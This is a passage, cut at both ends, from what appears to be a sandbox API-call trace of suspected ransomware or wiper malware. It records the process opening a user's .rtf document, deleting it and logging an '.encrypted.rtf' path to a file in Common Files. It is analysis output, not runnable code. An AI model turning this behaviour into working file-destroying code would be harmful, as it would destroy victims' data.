wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0033.268] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.268] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.268] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.268] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.268] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.268] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0033.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0033.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.269] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.269] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.269] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fa86ae0, ftCreationTime.dwHighDateTime=0x1d5c189, ftLastAccessTime.dwLowDateTime=0x4ca0c60, ftLastAccessTime.dwHighDateTime=0x1d5c073, ftLastWriteTime.dwLowDateTime=0x4ca0c60, ftLastWriteTime.dwHighDateTime=0x1d5c073, nFileSizeHigh=0x0, nFileSizeLow=0x5198, dwReserved0=0x0, dwReserved1=0x777648, cFileName="J7ZHze0f-VCkEbN69.rtf", cAlternateFileName="J7ZHZE~1.RTF")) returned 0x7c2100 [0033.269] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0033.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0033.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.269] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.269] CharLowerBuffW (in: lpsz="byte[20888]", cchLength=0xb | out: lpsz="byte[20888]") returned 0xb [0033.269] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.269] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0033.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.269] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.269] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0033.269] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0033.269] FreeLibrary (hLibModule=0x76b40000) returned 1 [0033.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.270] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.270] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.270] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.270] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0033.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.270] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.271] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0033.271] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.271] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\j7zhze0f-vckebn69.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0033.271] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.272] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.272] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0033.272] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.272] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.272] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.272] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.272] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.272] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.272] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.272] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.272] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0033.272] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.272] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.272] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.272] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.272] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.273] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.273] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.273] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf", lpFilePart=0x0) returned 0x3d [0033.273] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fa86ae0, ftCreationTime.dwHighDateTime=0x1d5c189, ftLastAccessTime.dwLowDateTime=0x4ca0c60, ftLastAccessTime.dwHighDateTime=0x1d5c073, ftLastWriteTime.dwLowDateTime=0x13b79380, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x5198, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="J7ZHze0f-VCkEbN69.rtf", cAlternateFileName="J7ZHZE~1.RTF")) returned 0x7c2100 [0033.273] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\j7zhze0f-vckebn69.rtf")) returned 1 [0033.274] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fa86ae0, ftCreationTime.dwHighDateTime=0x1d5c189, ftLastAccessTime.dwLowDateTime=0x4ca0c60, ftLastAccessTime.dwHighDateTime=0x1d5c073, ftLastWriteTime.dwLowDateTime=0x13b79380, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x5198, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="J7ZHze0f-VCkEbN69.rtf", cAlternateFileName="J7ZHZE~1.RTF")) returned 0 [0033.274] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0033.274] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.275] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0033.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0033.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0033.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0033.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0033.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.275] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.275] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0033.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.275] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.275] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.275] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.275] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.275] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0033.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.275] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0033.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0033.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.275] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0033.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.276] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0033.276] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.276] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.276] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0033.276] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.276] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0033.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.276] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0033.276] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0xf64, lpOverlapped=0x0) returned 1 [0033.276] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0033.276] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0xf64, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.276] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0033.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0033.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.encrypted.rtf\r\n", cchWideChar=74, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 74 [0033.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4a) returned 0x7f3630 [0033.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.encrypted.rtf\r\n", cchWideChar=74, lpMultiByteStr=0x7f3630, cbMultiByte=74, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.encrypted.rtf\r\n", lpUsedDefaultChar=0x0) returned 74 [0033.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0033.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0033.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0033.277] WriteFile (in: hFile=0x140, lpBuffer=0x7f3688*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3688*, lpNumberOfBytesWritten=0x6aee3c*=0x49, lpOverlapped=0x0) returned 1 [0033.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0033.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.277] CloseHandle (hObject=0x140) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.278] HeapFree (in: hHeap=0x770000, 